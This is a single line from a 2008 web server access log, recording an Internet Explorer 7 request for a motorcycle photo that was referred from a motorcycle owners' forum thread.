128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
